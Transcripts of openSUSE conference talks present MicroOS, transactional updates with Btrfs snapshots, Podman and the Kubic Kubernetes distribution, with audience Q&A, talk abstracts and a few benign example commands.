But if I remember right, when you have GNOME Software configured with Flatpak, it does have a bug reporting link in there, because GNOME Software basically looks like an app store, it even has the whole search and so on. When you are pulling an application from our repos, you get all the RPM metadata and the bug reporting link points to our Bugzilla; and when you get it from Flathub, I think the bug reporting link sends you to, probably, the GitHub project for something somewhere. So maybe it is as simple as teaching users that that is where you go to file bugs about applications; maybe it is more complicated than that. Or maybe we end up doing that as a service, in the sense that the openSUSE Bugzilla handles that stuff and we just have our Bugzilla sending things on to everybody else, because we know where they are. So maybe that is something the community, the project, still does, because we want to make life easier for our users. Yeah. So the latter was really what I was thinking about: basically giving the customer, or the community user, the same guarantee, but not necessarily having to build everything at SUSE with our own build resources. The other thing I think we should think about is: why can't we turn the layers around and say, okay, there is a very stable, locked-down runtime, but, just like now, where even on a Windows 10 desktop you can have a full Linux subsystem, there is still an RPM subsystem that you can use if you want to. And that would be a cool thing: you could have a Leap 15.1 subsystem, or you could have a stable subsystem on, I don't know, SLES 12 that you have to pay for. But it's not necessarily bringing all those RPMs back to your platform; the platform is rock solid, locked down, and yeah, transactional updates and all those things. That's an interesting idea. Most of the runtimes are oriented towards a specific desktop stack, like the Qt one and the GNOME one. They do have some runtimes which get used for the more generic applications, which are kind of stupid, like the freedesktop runtime, which is basically an entire distribution bundled as a runtime. If we go down this road, which from the look of things some of us are, and we really start getting looped into this whole Flatpak stuff, I can see our way of thinking meaning that, in addition to stuff like the freedesktop runtime, a Leap runtime and a Tumbleweed runtime might make perfect sense to slip in there for that non-GNOME, non-KDE, uniquely weird stuff. So yeah, I could see that kind of thing falling out of this. Any more questions? Yeah, Panos. I don't see that I will be a user of that. There were many points made here, even from Haris, about a supported way or whatever, and I don't see any point in having this. I mean, if I want to use a containerized version of something, I don't need openSUSE for this unsupported way of doing it.
What I'm thinking as a use case is, speaking of myself, there were some times that I would like to have my development environment easy, and I'm thinking if you could have, for example, a micro-S, however you can call it, something that I can have in VM, somewhere in a cloud that is small enough so I don't pay much, but I can have, for example, my VS code running there as a desktop because you're talking about micro-S desktop, so I can have a remote desktop containerized in that case, which is small, so again, I don't pay much to do digital ocean or something like that, but in the same way, it gives me a very specific thing, so do one thing and do it well. In my case, let me develop GoLang apps, so something lightweight, something like that. So like a micro-S desktop with Podman? Some use cases like collect feedback from the community in that case, so yeah, something that I can run on my Raspberry, I don't want to have petabytes of different GNOME applications. I don't see any point in the ANK apart from just doing it once and then just going to the forums and saying, hey, look, I run the latest and greatest of stuff that, okay, that's it. So I don't see the containerizing a desktop use case. We're not talking about containerizing the desktop though. The desktop wouldn't be containerized. It's going to be a traditional installation on a bare metal or in a VM. Running normally, it'll be micro-S, so read-only root file system and locked down, but that's not containerized. The only containerized part potentially would be the user-facing applications. So in your case, where you want just a development environment, well, don't install any apps, then you're not going to have any junk there. You're going to get basically nothing more than a fast-booting system, because micro-S boots quickly, going straight into GNOME and giving you a terminal, and then you can do all your stuff in your terminal. So if you are containerizing only the apps, meaning that they can run everywhere, then why do you need an open-souser desktop to run them? Because if we do it this way, it's the best option out there, because all of our users can be really lazy. They just deploy their micro-S desktop. They never have to worry about patching it. They never have to worry about maintaining it. They just pick their apps and it keeps on rebooting all the damn time, because that's... See the Linux desktop for people who don't want to have to mess around with the desktop anymore. That's the problem. It's a desktop for non-desk-to-users. So... Cool. Two minutes left. And last question. Anybody? No. Cool. Thank you. I'll post on factory where the mailing list is going to be for this crazy idea then. Thanks. party emoji Nope.
Kubic with its MicroOS core is an exciting distribution that takes much of the cool stuff we're doing in Tumbleweed, adds solutions to the problems of updating a running system, and is becoming the perfect base system for running containers. But in openSUSE, running server stuff is only half the fun. Why should servers be the only platform enjoying automatic, atomic, "auto-rollbackable" system updates? Surely desktop users want to be lazy like server admins also? Can the tools and approaches implemented in MicroOS help create the desktop distribution of the future? Let's find out! This talk will introduce the concept of 'openSUSE MicroOS Desktop', a desktop focused variant of MicroOS based on Tumbleweed. Various ideas will be discussed, prototypes will be shown, and feedback will be expected from the audience to help shape this potentially exciting take on the future of openSUSE on Desktops.
10.5446/54419 (DOI)
Okay, then. Thank you all for coming. I'm Richard Brown. You know who I am. I'm going to be talking about micro-OS. To start, who here has heard the term micro-OS or cubic? Raise your hands please. Cool. I want you to forget everything you think you know about micro-S or cubic. When I was doing this presentation, I realised I could turn this into a history lesson of everything we've tried and what we were thinking a year ago and what we were thinking a year before that. And then I realised that would make a really boring presentation. So I'm doing my best here to describe what micro-S is today, where we're going today. And I'm therefore likely to say things which don't make any sense with your previous understanding. So, kind of, yeah, do you best to forget it, go with me. I will do my best to leave room for questions at the end so we can kind of bridge any gaps between then, now, where we're going. So the story for micro-S for me kind of actually starts with my story of computing. When I started with a computer, a Commodore 64 was my first machine, and it was a machine that could do one thing at a time. One cassette tape, yeah, put one cassette tape in, wait 20 minutes for it to load. If you want to do more than one thing, you need to have more than one Commodore 64 next to each other. And this is sort of where computing started before networking even, and that's where things started getting interesting later on. You know, with the PC, with networking, what did we all start doing? We started plugging them all together and building networks and using PCs and using laptops. And as we started doing that, the story in many respects became less about that one thing running on that computer, but what can all the things do when they're connected together? This became the era of the internet, and we had networking first and then the internet. And when you look at that, what comes as baggage with networked computing, you realise that you end up, it brings with it a certain pile of complexity. The more computers you have on a network, be it a WAN or a LAN or the internet, you need more infrastructure. More networking, more switches, more air conditioning. In businesses or even at home, the more hardware you have, it's harder to get that money, especially when it's big expenses and inside companies you always have the issue of capital expenditure versus operational expenditure. The more machines you have, the harder time you have with configuration management, keeping those machines running. You want to keep them all running kind of the same way, so we all end up with these wonderful shell scripts on our laptops or whatever to set up the machine exactly the way we want to do it. And of course you don't have to spend all of that time patching. So if you're thinking now, 90s, early 2000s, I used to be a system administration, what was lesson number one of system administration? Try and have as few machines as you need. Always try and minimise the amount of hardware you have in the data centre. Always try and minimise the amount of that additional complexity with your network because if you just keep on throwing machines at the problem, you're just going to bulk up that pile of baggage at the end. And so you end up with servers in particular running more than one service. The traditional kind of SUSE of the Lakes Enterprise, or many cases the traditional sort of open SUSE server, doesn't just do one job. It's a mail server, and a web server, and a database server, and something else. 
Because that helps cut down that infrastructure baggage, the connection tax sort of side of things. But that in itself ends up bringing more complexity. You may have less machines, but you still have this nasty configuration management problem because you've got to worry about the configuration of 20 different services on this one box. And they might be incompatible with each other. Try and run two versions of PostgreSQL on the same server at the same time. It's not going to be easy. Those machines are going to need to have more hardware, more RAM, more CPU individually. And a problem that I used to have a lot of the sys admin is what's described here is problem pooling. Everything individually works fine, and then one student does something really stupid on that Apache server with PHP and your entire infrastructure is broken because Apache ended up eating all the CPU, which then meant your database server stopped working, which then meant the cluster crashed, which then meant the HR system doesn't work anymore. The whole thing cascaded because you dumped it all on this one machine. So you couldn't just bundle everything onto less servers. And then of course the world's changed and we stopped talking about servers and data centers as much and started talking more about cloud. And part of the cloud story is this idea of making IT infrastructure more modular. Of splitting as much as possible, splitting those various services into the smallest sensible chunk, managing them in that chunk, and therefore ideally hopefully minimizing that problem of pooling problems together or complexity on an individual system. And this is the new world we're actually living in today. It's not just a case of cloud. You could say virtualization is part of this story. And generally speaking with virtualization, how many are doing lots of stuff with VMs on data centers, for example? So when you have a new service, what do you do? Do you add another service to an existing VM or do you just spin up a new VM? Both. Okay. But more and more you're probably spinning up more and more VMs. Especially with cloud unless you want to avoid having to spend too much money. Containers live this life. IOT live this life. And so more and more you end up with systems that are being deployed to just do one job. A single purpose system. Containing the minimum amount of service, minimum amount of binaries that needs to do that one job. In some cases, totally ignoring patching. Just deploy the thing in the cloud, run the thing, destroy it, deploy the new thing. And when you need to add more services, you add more VMs, you add more containers, you add more cloud answers, whichever poison you're using in this new world, the model is one that just encourages more and more installations of an operating system actually individually doing less and less. And that solves a little bit of the problem. The incompatibilities of running multiple versions of the same thing on the same machine goes away because you're not running multiple versions there anymore. The problem pooling goes away as well. But you're still left with the hardware requirements getting higher and higher the more you're putting on the bare metal. And you're left with configuration management, which is probably getting even worse. The more VMs you have, the more various installations you have around there. 
So to really solve the problem of the perfect operating system for this new world, for containers, for single-purpose systems, it needs an answer for the configuration management problem: minimizing the possibility of the configuration of an operating system drifting or changing, and ideally having as little on there to be configured as possible, because if there's nothing there to configure, there's less there to go wrong. Patching: you need security updates, you need to be running the latest version of the right thing, and as much as possible that should be totally automated, for obvious reasons: if it's automated, you don't have to worry about doing anything about it. And the hardware requirements of that operating system should be minimized or optimized as much as possible for that job. I just realised I talked about all of that without changing the slides. When we've been looking at that in our team, we ended up focusing on the configuration management and the patching side of things. As operating system engineers, we're looking at the best way of minimizing the problems and mitigating the issues. At SUSE, we've been doing stuff with Btrfs since forever, and in SLE we have snapshot and rollback. With that in context, we realised that the solution to those two problems can really be answered by one champion solution in between: the concept of transactional administration. You want to minimize the configuration management requirements, you want to minimize the amount of patching you need to do, but you're still going to have to change something on a machine, you're still going to have to patch it, so you need to be in a position that if it's worth doing, if you're actually changing the configuration or the state of a system, you can undo it, that it can easily be rolled back to the last known working state. So any change should be transactionally applied, in a way that's totally reliable, totally reproducible, and totally reversible, because any time there's a change, there's a chance something will go wrong. Of course, we also realised at this point that every sysadmin has this almost secret rule that they never want to touch a running system. If it's working, don't touch it, especially on a Friday night, because if you deploy on a Friday night, you're going to be working on Saturday. So, two years ago now, we introduced into the openSUSE ecosystem this idea of transactional updates, which is a way of updating a system using Btrfs and Snapper, but in a different way than you normally see in openSUSE and Leap: it is totally atomic. The change to the system happens in one single atomic operation; it either entirely happens or none of it happens. And when it does happen, it happens in a way that doesn't influence the running system: the system keeps running, you're updating the file system in the background, the files currently in use don't get touched, and then you flip from the current system to the new system on a reboot. Because it's all happening in one single atomic operation, and that's captured in a snapshot in Btrfs, it can be easily rolled back. And because it actually takes effect at a reboot, it's also trivial at that point to test: has the reboot happened properly, have all the services started up right, is everything working the way it's meant to work?
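To make that "atomic, reversible" idea a bit more concrete, here is a deliberately simplified toy model of the cycle. It is not the real transactional-update or snapper code, just the shape of the transaction: changes land in a new snapshot, the running system stays untouched, and the new snapshot only becomes the running system if it survives the post-reboot health check.

```python
"""Toy model of a transactional update cycle (not the real tooling)."""
from dataclasses import dataclass, field


@dataclass
class Snapshot:
    number: int
    packages: dict = field(default_factory=dict)


class System:
    def __init__(self):
        self.snapshots = [Snapshot(1, {"kernel": "4.12"})]
        self.running = self.snapshots[0]
        self.next_boot = self.snapshots[0]

    def transactional_update(self, changes: dict) -> Snapshot:
        # Clone the current root into a new snapshot and apply changes there;
        # the running snapshot is never modified.
        new = Snapshot(self.running.number + 1, dict(self.running.packages))
        new.packages.update(changes)
        self.snapshots.append(new)
        self.next_boot = new
        return new

    def reboot(self, healthy: bool) -> None:
        candidate = self.next_boot
        if healthy:
            self.running = candidate          # the whole change set takes effect at once
        else:
            self.snapshots.remove(candidate)  # rollback: keep booting the old snapshot
            self.next_boot = self.running


if __name__ == "__main__":
    s = System()
    s.transactional_update({"kernel": "4.13"})
    s.reboot(healthy=False)       # the update misbehaved, so we stay on 4.12
    print(s.running.packages)
```

In the real system that health check and automatic rollback are exactly what the next part describes.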
And if it's not working the way it's meant to work, it's incredibly easy to just throw that snapshot away, reboot again, and get back to where you were. If you want to know more about transactional updates, there's another talk in here at 12 o'clock tomorrow: Ignaz is talking about the state of transactional updates after the last couple of years of it being in openSUSE — where it is, how we're using it — so I'm not going into too much detail here. Admittedly, it's not all wonderful; there are some areas where we're trying to improve things. So on Sunday at 10 o'clock, also in here, Thorsten is talking about some of the ideas we have for improving the situation of transactional updates with /etc. So on the whole configuration management side of things, things are getting better, we're minimising it, minimising the problems — but there's still some left, and we could do with some suggestions and ideas there. So with this combination of basically using Salt and a read-only root file system, we're doing our best to solve that configuration drift problem. The idea with MicroOS is that we're minimising what you can change on the system, while at the same time using Salt so that when you do change it, it's as standardised across all of your machines as possible. On top of that, we're using transactional updates. And on top of that, we're optimising the footprint — not installing too much, not bundling a million files on there — so of course there are fewer things on the system, and fewer things to go wrong. When we originally started with MicroOS, we always talked about it in the context of containers. But when you think about it, it's actually far more generic than that. It's now a perfect operating system for any sort of single-purpose deployment. Containers are one example, but a VM that's just doing one thing, or an IoT device, or something like that — MicroOS perfectly fits that niche. It's a rolling release based on Tumbleweed. In fact, we're building it totally as part of the Tumbleweed project. So we advertise it and talk about it as if it's a different distribution, but it's not a different code base: it's tested in the Tumbleweed project, it's built in the Tumbleweed project in OBS, and it's actually part of the Tumbleweed release process. So if Tumbleweed changes something that breaks MicroOS, then neither of them gets shipped, and vice versa — if MicroOS breaks something, which I admit I probably do a bit more often than I should, then I'm the reason Tumbleweed doesn't have a snapshot that day. But that means, of course, if you're using Tumbleweed, you know that quality, you know what we're doing there, and this is part of that same level of always usable. With the additional benefit that, because transactional updates are the only way of doing it, in some respects it's a safer version of Tumbleweed to use, because it can roll itself back if it all goes wrong. But I'm getting ahead of myself — I've got another talk about that later today. We've got various deployment options for MicroOS available now. We have a fully working, tested DVD and NET ISO with YaST, so you can download it and boot up a system with it. You get a slightly optimised workflow with YaST compared to the typical Tumbleweed installation, so there are fewer screens, fewer steps, fewer things to ask for.
But we've still kept a lot of options there on the summary screen at the end, so you can really dig in, customise, add extra stuff — because it's YaST; what's the point if we didn't give you that option? We also have a bunch of other things, most of them in some state of development. We have VM, cloud and Raspberry Pi images, based on what Fabian was talking about, which are there but still need a little bit more testing before they're officially part of the release process. We have Yomi, which is a method of installing MicroOS directly from SaltStack — or we'll have that very soon. For all of these images and ways of deploying, we're using at the moment a combination of either cloud-init or, soon, Ignition for configuring the MicroOS system on first boot, handling things like the network configuration, SSH keys, et cetera. The idea being you just deploy it, it boots up, it's ready to go, it's already running; you don't have to do anything else, just put your workload on top of it. Yomi, the Salt-based installer, is a really exciting part of that. You can come to the gallery, the other room, tomorrow at 3 o'clock — Alberto is talking about that, so I don't have to go into more detail here, which is nice, because otherwise I'd run out of time. With all of that put together, the question then becomes: what are you going to use MicroOS for, now that it's not just a container operating system? So, some examples — the obvious one is containers, it's where we started; we started this MicroOS stuff playing around with a container operating system. But anything that's hosting a single service is a perfect use case for this: things like single-service VMs, cluster nodes, hardware appliances, Raspberry Pi, IoT. The idea is that whether you're running it as a container host or just putting an extra RPM package on top, MicroOS should be the perfect openSUSE for that kind of use. In my case, I've become a complete MicroOS addict. I'm obviously chairman of openSUSE, I've been using Leap, I've been using Tumbleweed — and at the moment I have one Leap machine left. Everything else in my life is either pure Tumbleweed or MicroOS, including all of my personal infrastructure. I have a Nextcloud server that's running on MicroOS as a container host, using the Nextcloud container. There's my blog, there's the Kubic blog — pretty much every blog that I'm involved in somewhere is running on MicroOS, running Jekyll on top. In those cases I'm not using a container, I'm just using plain Jekyll RPM packages and running that one service there to deploy the website. I have a retro gaming machine that's plugged into the back of my TV, using a combination of MicroOS with RetroArch and EmulationStation. That's been plugged into the back of my TV now for the better part of a year and a half, and I haven't actually looked at the console for that whole time. It's just been plugged in, updating Tumbleweed every single time, rebooting itself in the middle of the night, and whenever I feel like playing old retro games, I just flick to that on my TV and it's there and it's working, running the latest version of EmulationStation based on what we have in OBS, and it's never gone wrong. I didn't bring it with me today — I might bring it tomorrow. I take it to conferences, we shove it on the booth when everybody's bored and play a few games, and it's never gone wrong.
Every time it boots up, it's there, working fine, and I assume at some point Tumbleweed has had a bad day, but it automatically rolled back, so as a dumb user I don't notice — it's just there, always working with the newest stuff. My Minecraft server, which me and my friends use — same again there: another MicroOS machine, in this case I think running on Hetzner, so running in the cloud, and that's just running a container on top of it, and it keeps patching itself and I don't pay any attention to it; it's just there and working. So after I'm done rambling about this stuff, Ishi is talking about how he's using MicroOS in production at 4.15 in here, and if you want to hear me ramble on about this a bit more, I have a crazy idea about using MicroOS as a desktop — I messed around with this in a past Hack Week project, and I'll be talking about it more at 3 o'clock in here as well. If you're interested in playing with this, it's part of Tumbleweed: on download.opensuse.org, under Tumbleweed, in the appliances folder and the ISO folder, you can download it now. We don't have a website for MicroOS yet — volunteers are welcome, please. It's all new, we're moving stuff around, so if you're interested in working on a website for that, please find me around the conference; let's talk. We obviously need to start spreading this, and just having ISOs sitting on a download server isn't going to get everybody using it, but at least technically speaking we can say it works, it's awesome, we're building it, we're testing it, it's good quality. Now we just need to spread it around the whole world. So that's MicroOS. What about Kubic? With MicroOS now defined as this general-purpose single-purpose operating system — you can use it for anything, but we expect it to be deployed to do just one thing at a time — Kubic is now a MicroOS derivative. Basically, it's a showcase of what you can do with MicroOS when it comes to containers or Kubernetes. We're still using the name Kubic because people know it and it's part of the Kubernetes ecosystem — it's known by the Cloud Native Computing Foundation and the like — but from a technical perspective it's just a MicroOS variant, and just like MicroOS it's built as part of Tumbleweed, tested as part of Tumbleweed, shipped as part of Tumbleweed. So we now have three distributions all on one code base. Containers in particular are fun. They do a really good job of trying to solve that kind of problem pooling problem — problem pooling problem? well, should have thought about that — by separating the service or the application from the operating system. And I've realised more and more, as a distro engineer, as a Linux geek, I don't necessarily care about that, because I'm the kind of user who is perfectly happy doing everything in RPMs; I care about the base system and I care about the application, I worry about all this stuff. But most users don't. They don't want to worry about the operating system, they just want to worry about the one thing they care about — their web server, their Minecraft server, whatever. And containers give a really nice model of reflecting that, technically speaking. The developer, the user, can just worry about the service they want to deploy. And they can micromanage that: they can really take care of what's in that container, where they pull that container from, how they configure it.
And that's the bit of the story they want to worry about; they just want something underneath that they can leave and forget about and not do anything with. But now we have MicroOS — and like my examples, I've just deployed it and I don't look at it anymore; it takes care of itself, it patches itself. So marrying these two things together works really, really nicely. But you need, of course, something to run those containers inside. So we're huge fans of Podman in the Kubic project. Podman is an alternative to that other container runtime beginning with D that people like. One of the reasons Podman is a really interesting project is that from an architectural perspective it's more interesting: it doesn't have a single daemon. With Docker there's this one big Docker daemon, which is a nightmare to secure, a nightmare to manage, and if that Docker daemon dies, all of your containers become impossible to manage. With Podman, it acts like an old-fashioned UNIX application, in the sense that it starts a container as a process; you can manage the process, you can stop the process, and there's no daemon to die, so you can still manage things if they go a little bit weird. And it supports all of the same containers that Docker does — in fact it uses all the same commands that Docker does, plus some fun extra ones as well. So for a lot of people, if you want to transition from Docker to Podman, just alias docker to podman and the commands will mostly work the same. In the case of Kubic, we don't install Docker by default anymore — in fact I don't offer Docker anywhere in the installation options anymore — so you're going to get Podman by default. If you don't like that, you can install Docker from Kubic, from Tumbleweed, and it'll work as well. But please, if you're interested in containers at all, try Podman, play with it, it's awesome. When I wrote this slide, I forgot that Fabian was going before me, but yes, we have registry.opensuse.org now. It's building containers directly from OBS. It rebuilds those containers as OBS rebuilds the packages, so the containers are always fresh, they're signed, they're notarised, and with Podman it's nice and simple: you can just run a single command and download the latest official Tumbleweed or Leap container — and we're adding more containers as more people contribute. If you want to know more about that and you weren't here half an hour ago, just watch the video, because Fabian did a really good job of explaining how we build those containers and how you can contribute. Who here has heard the word Kubernetes before? Cool. Kubernetes is special — containers, running them at scale — and when I say special, I mean it in the positive and the negative sense. It's designed to run hundreds of containers across dozens of machines, and when you look at that from a distro engineer's perspective, it's an absolute nightmare. Like Dr T was saying about CaaSP and Kubic this morning, part of the reason why things have gone a little awry there is that there is just an infinite amount of moving parts. No matter which layer of the stack you look at, from the user's point of view they always want to have the latest containers. You have the containers moving really quickly, and of course the latest containers probably require the latest Kubernetes, so they need Kubernetes to move really quickly too.
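Before carrying on with the Kubernetes side of the story, here is a rough sketch of the Podman workflow just described; the image path matches the registry mentioned above, though exact repository names and tags may change over time:

```sh
# Most docker invocations keep working unchanged.
alias docker=podman

# Pull and run the official Tumbleweed container built and signed in OBS.
podman pull registry.opensuse.org/opensuse/tumbleweed
podman run --rm -it registry.opensuse.org/opensuse/tumbleweed bash

# No daemon involved: containers are ordinary processes you can list and stop.
podman ps
```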
That fast-moving Kubernetes of course has an impact on your container runtime, whether you're using CRI-O or Docker, and therefore that needs to move really quickly. That of course means the base operating system has to move really quickly, and somehow all these different parts have to move really, really quickly and at the same time actually work. It's the problems we were talking about earlier — configuration management, patching, hardware — just amped up to 11 and then some. But Kubic, because it's based on MicroOS, because it adopts this principle of single-purpose operating systems, is basically in my mind the perfect Kubernetes operating system, because the Tumbleweed base — the moving-quickly part — is totally solved. We can move as fast as all of the upstreams without worrying about things much at all. It also means we can integrate the latest stuff from upstream right away, such as kubeadm. In Kubic, for Kubernetes, we don't use Podman, because Podman is more designed for your single host; instead we're using CRI-O, which is basically the same thing but optimised for Kubernetes rather than a single host. Coming soon — in fact, technically... oh, I just realised why Merita was pointing slightly; there we go: Kubic, everything I was just saying. Coming soon, we have kured, which is a service running on your Kubernetes cluster to help orchestrate the rebooting aspect of patching Kubic systems. Because Kubic patches itself and then needs a reboot for the patching to take effect, and with Kubernetes you have a large cluster with hundreds of different machines all doing different things, you don't necessarily want those machines randomly rebooting when it's really inappropriate, when the cluster is busy. With kured — kured stands for Kubernetes Reboot Daemon, by the way — you have a service sitting on Kubernetes that is aware of what your cluster is doing. kured is now integrated with transactional-update, so it can see which machines are ready for a reboot and then trigger the reboot when the time is appropriate. We also have a new tool called kubicctl, which helps streamline and bootstrap the whole Kubic Kubernetes story. We're using kubeadm to actually start and build the cluster, but with kubicctl we wrap that around, helping set up a Salt master and configure Salt all at the same time. Unfortunately, I don't have time to talk about that today. Setting up a Kubernetes cluster on Kubic is incredibly easy — the documentation is on the wiki. You need at least two machines. You set them up at the moment using the YaST installer, or you can use the images we're working on; basically, install it. SSH is automatically configured. In addition to SSH, we also have this really cool tool called TALO, which is basically like fail2ban: it listens to your systemd journal, figures out who's trying to access your SSH connections, and if there are too many failed attempts to guess the root password, it just blocks them and sets up the iptables rules, so it's nice and secure. Another one of those nice things with Kubic is that you don't have to worry about configuring it much after deployment — it's already there, already taking care of itself. Once you've got your first Kubic node installed, all it takes to set up that node in the cluster is one command. If you've seen previous versions of this slide, that command used to be really long.
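For orientation, a hedged sketch of roughly what that bootstrap looks like with stock kubeadm — the network CIDR, addresses, token and CNI manifest URL below are placeholders, not the exact values Kubic uses:

```sh
# On the first node: initialise the control plane.
kubeadm init --pod-network-cidr=10.244.0.0/16

# Configure kubectl with the admin config that kubeadm just wrote.
mkdir -p ~/.kube && cp /etc/kubernetes/admin.conf ~/.kube/config

# Deploy a pod network (pick your CNI; the URL here is a placeholder).
kubectl apply -f https://example.com/my-chosen-cni.yaml

# On every additional node: run the join command kubeadm printed at init time.
kubeadm join 192.0.2.10:6443 --token <token> \
    --discovery-token-ca-cert-hash sha256:<hash>

# Back on the first node: check that the nodes have joined.
kubectl get nodes
```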
Thanks to working with upstream, we've managed to solve most of the issues: it's just one command and a string for setting up the network. In fact, in the talk tomorrow about Cilium, there's an alternative way of doing this using what you'll learn about Cilium there. When that's finished, kubeadm gives you a nice command, which is way too small to read here — basically, that's the command you need to run on the other nodes of your cluster. They will join the cluster and automatically have their keys configured and trust established between the other nodes and the master you just configured. Then you need to configure a client so you can manage the system. That's nice and easy because kubeadm has already made the config files for that, so you basically just copy them to the right location. You need to have a network — again, nice and easy because we're in this wonderful container world, so a single command there will deploy your container network to your cluster. After those few commands you're done; you just add all the additional nodes using the command you were given at the beginning, and you end up with a Kubernetes cluster. You can then start deploying your containers, have the containers automatically moving around multiple machines, taking care of themselves — the combination being Kubic underneath, patching itself, rebooting itself, and the containers on top moving around the cluster, so everything is always working all the time. To know more about Kubic — because there are just so many talks about all this stuff that I didn't have to fit it all in here — Dennis is talking here today about using Kubic with Ceph and with Rook, just before five o'clock, and then after him there's a talk about Kubic and openSDS as well. With that, I'm done, with ten minutes left for questions — does anybody have any? If you do, I think I have the speaking microphone, so I'm afraid you're going to have to go to the one at the back, because I broke the other microphone. Hello, Joe. Hi. So you've really advertised using MicroOS. Are there any reasons not to use it? I mean, why wouldn't we just change everything to MicroOS? Why isn't it the perfect solution for everyone? So, if the deployment — the machine, the VM or whatever — is just going to do one job, I think it might be the perfect answer for everything. That's what I want to explore a little more in my talk an hour from now; I'm not quite sure on that. But if you're the kind of person who wants to tinker with the machine once it's deployed — like, say, me as a typical Tumbleweed user, installing packages and removing packages and really messing around with the innards of the system — MicroOS is not a friendly system for that, and it's going to be rebooting every time you make a change to that part of the operating system. So if tinkering and playing around is your thing, MicroOS isn't the best for that. But if it's more a case of wanting to deploy it, have it do just one job, and once it's deployed pretty much forget about it, I really think there's a place for MicroOS in tons of places. Yes. What I'm hearing from some users is that the reboots are just too frequent, because every update has to go through the reboot. Would there be a way of doing it, like, in two worlds?
If you have updates that are safe to apply, like non-kernel updates, could we still apply those directly, keep the file system read-only otherwise, and only do the copy-and-reboot for the big ones every three months, where you do the kernel updates and the major security updates that really need a reboot? Would you like the answer that SUSE management would probably like me to give, or my personal answer? The personal one, then. I don't trust maintenance updates. They have a habit of breaking more than Tumbleweed updates do, and partly there's a legitimate technical reason for that: it's incredibly hard when you're trying to change just one thing in a complex system, and that desire to minimise the change brings with it certain risks that in Tumbleweed we just manage to blast right past, because we can change everything. If that one tiny change needs us to change 20 libraries, we change those 20 libraries, we test everything, we ship everything. The MicroOS patching model is kind of a reflection of that philosophy. Maybe there is room for a hybrid. If there is, I'm probably not the best person to find it, because I'm very much on the rolling-everything side of things. Good? Okay — by the way, I'm running my laptop on Tumbleweed, so I know what you're talking about. Yeah. When you say doing one thing, what do you mean? In so much as, would something like OBS class as doing one thing — or which part of OBS are you talking about, workers, et cetera? Yeah, it's a bit of a nebulous term, kind of on purpose, because the scope of one thing can vary. The typical kind of one thing would be something like a container host: in that case it's MicroOS plus Podman. That's the scope of MicroOS; the one thing is Podman. The fact that Podman might be running 20 different things in containers is out of scope of the operating system — we're not going to reboot because you deployed a new container; the system state only changes because Podman itself gets an update. So with MicroOS, there's nothing stopping somebody installing MicroOS today, doing transactional-update pkg install for 20 different packages, turning all of them on, and having those 20 things be the one thing for MicroOS. You bring with that more of, like Joe mentioned, the patching problem: the more things you deploy there, the more things are going to move, and the more things are going to need a reboot. If you try to make this one machine do everything, you kind of lose the benefit of MicroOS being this simple deploy-and-forget option. So there's a balancing act in between. With something like OBS, I think OBS is smartly designed enough that many of its parts are already built that way. The workers, for example, would probably make perfectly good MicroOS use cases, because you deploy MicroOS, you have the worker software on there, and then everything else is VMs for the build part — so that would work. I'm talking later about the MicroOS desktop; a desktop is kind of stretching the one thing a little bit, but that's what I want to explore with that. Thanks. I want to explore whether it makes sense to install Wayland and X and GNOME and kind of define that as the one thing, and see where that goes. So I don't want to strictly define it down to, oh, it has to be one package or whatever. It's openSUSE — we want to figure out where that line perfectly is.
But if someone's going to file a bug on MicroOS and say, I installed these 20 things and one of them doesn't work, I'm probably going to suggest they use something other than MicroOS. Any more questions? Yep, cool. I have one question about the file system, because I think now you can create a snapshot of the system and roll back to a previous version. But still, the file system sometimes may break, or it just fills up and you cannot write anything to the disk. Does MicroOS have something to solve the problem that the file system itself may fail, so that we can recover it? So, Btrfs has a bit of a reputation for being a hard beast to live with. In my opinion, it's mostly an unfair reputation, and I'll try to answer your question in both parts. In terms of Btrfs filling up because of snapshots, which is something we've had a ton of in openSUSE — and part of that is at least partially my fault — there is a balancing act in making sure that the root file system is big enough for the snapshots caused by the root file system changing. Until recently, I don't think we got that balance right. Currently, in Leap 15.1, in MicroOS, in Tumbleweed, I really strongly believe we've solved that problem, because I've spent a really hard time trying to get the libstorage-ng sizing rules for all of those things to be far more accurate for the real world. So we generally have YaST automatically making the root file system bigger, so it has more space for those snapshots. Plus, Arvin on the YaST team has done a lot of work with Snapper, so it tidies up after itself better. Those two things together mean Snapper shouldn't be filling up the disk anymore. Full stop. That should be fixed. The other part of the reputation — Btrfs being a bit fragile — I actually talked about at OSC last year; there's a lightning talk I did on it. The biggest thing with Btrfs is that it's aware of what's going on with the disk. It's smart. It's got its data, it's got its metadata, and it's constantly checking that those things are in sync. When something goes wrong, it takes the action of mounting everything read-only, so people think it's broken. It's not broken — it's just taking care of itself. Unfortunately, when that happens, most people have used something like ext4, and what's the first thing we all do when ext4 is misbehaving? We run fsck. If you run an fsck-style repair on Btrfs, especially with --repair, you're probably going to break Btrfs. It's why the documentation says this is the last thing you should ever do — but nobody reads the documentation. On the openSUSE wiki, we have a 14-step guide on basically what to do when Btrfs misbehaves. For 99.9% of people, you don't get past step 4 before it's fixed; actually running the repair is the last step. When you do the right things with Btrfs, it's perfectly reliable — SUSE is using it in the enterprise. Read the manual, read the wiki, and don't panic when something goes wrong. In the last four years I've never had a Btrfs system I haven't been able to fix — and I've had a lot of broken systems. Thanks. Cool. Good. I think I'm out of time. Thank you very much.
As the world moves more and more towards containerised solutions, a number of real questions start to appear. - What is the perfect platform for running containers atop? - How to use this platform as part of a flexible, scalable, highly available infrastructure fabric? - How to minimize the maintenance and administration of this platform at scale? Many of these problems are well answered in enterprise container offerings, but for developers more interested in the state of containers & kubernetes upstream, new issues start to appear. With such fast moving upstreams, developers and enthusiasts need a platform that can keep up and is closely involved with those upstream developments. This platform needs to not only be able to run containers at scale, but also on a single machine, all the while preserving the attributes of low maintenance so the focus can be on the containers, not the base system beneath them. And then the question becomes "What is so special about containers anyway?" - in more and more cases, people are deploying Linux VMs, cloud instances, or bare metal to do 'just one job', with other jobs being handled by other machines. Can we simplify the Operating System and make it easier to live with if we optimise it for these 'single-purpose' deployments? This talk introduces openSUSE MicroOS, and explains how it addresses the above, being the perfect distribution for this modern age. The session will explore in some detail how MicroOS is developed in lockstep with the Tumbleweed rolling release and can be used for a wide variety of single-purpose systems. This talk will also discuss openSUSE Kubic, the MicroOS variant focused on containers. The talk will share how Kubic collaborates with various upstreams including kubeadm and CRI-O. Transactional Updates, Kubic's system update stack, will be demonstrated and the benefits of such an atomic update approach discussed in some detail. Finally the kubicctl Kubernetes cluster bootstrapping tool will be discussed and some future plans shared for consideration and feedback.
10.5446/54420 (DOI)
